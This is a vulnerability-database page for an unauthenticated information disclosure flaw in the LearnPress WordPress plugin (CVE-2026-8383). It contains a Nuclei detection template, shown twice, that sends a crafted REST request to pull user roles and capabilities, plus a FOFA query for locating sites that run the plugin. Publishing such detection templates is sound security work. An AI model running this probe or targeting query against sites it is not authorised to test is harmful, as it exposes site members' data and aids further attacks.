LearnPress < 4.3.7 - Information Disclosure

CVE-2026-8383

Early Release

Description

LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

learnpress

Published Date

June 25, 2026

Template Author

0x_akoko

CVE-2026-8383.yaml

id: CVE-2026-8383

info:
  name: LearnPress < 4.3.7 - Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.
  impact: |
    Unauthenticated attackers can access sensitive user role and capability information, potentially aiding further attacks.
  remediation: |
    Update to version 4.3.7 or later.
  reference:
    - https://wpscan.com/vulnerability/b7cbf68b-62c5-4787-b84b-69df9e0122b2/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8383
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-8383
    epss-score: 0.00187
    epss-percentile: 0.085
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    fofa-query: body="/wp-content/plugins/learnpress/"
    tags: cve,cve2026,wordpress,wp,wp-plugin,learnpress,disclosure,rest-api

http:
  - raw:
      - |
        GET /wp-json/learnpress/v1/users?context=edit HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"roles\"", "\"capabilities\"", "registered_date")'
        condition: and
# digest: 4a0a00473045022100ae18529637091c71eeff6e38f7f9086f5bc9b985fb6d29146271c3d1b9cff1ca0220636726a09bc9cab08d4b385429a49423dc359096b26f15ee28c593e70344599d:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2026-8383

CWE ID:

cwe-862

References

https://wpscan.com/vulnerability/b7cbf68b-62c5-4787-b84b-69df9e0122b2/https://nvd.nist.gov/vuln/detail/CVE-2026-8383

Remediation Steps

Update to version 4.3.7 or later.

id: CVE-2026-8383

info:
  name: LearnPress < 4.3.7 - Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.
  impact: |
    Unauthenticated attackers can access sensitive user role and capability information, potentially aiding further attacks.
  remediation: |
    Update to version 4.3.7 or later.
  reference:
    - https://wpscan.com/vulnerability/b7cbf68b-62c5-4787-b84b-69df9e0122b2/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8383
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-8383
    epss-score: 0.00187
    epss-percentile: 0.085
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    fofa-query: body="/wp-content/plugins/learnpress/"
    tags: cve,cve2026,wordpress,wp,wp-plugin,learnpress,disclosure,rest-api

http:
  - raw:
      - |
        GET /wp-json/learnpress/v1/users?context=edit HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"roles\"", "\"capabilities\"", "registered_date")'
        condition: and
# digest: 4a0a00473045022100ae18529637091c71eeff6e38f7f9086f5bc9b985fb6d29146271c3d1b9cff1ca0220636726a09bc9cab08d4b385429a49423dc359096b26f15ee28c593e70344599d:922c64590222798bb761d5b6d8e72950

LearnPress < 4.3.7 - Information Disclosure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LearnPress < 4.3.7 - Information Disclosure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps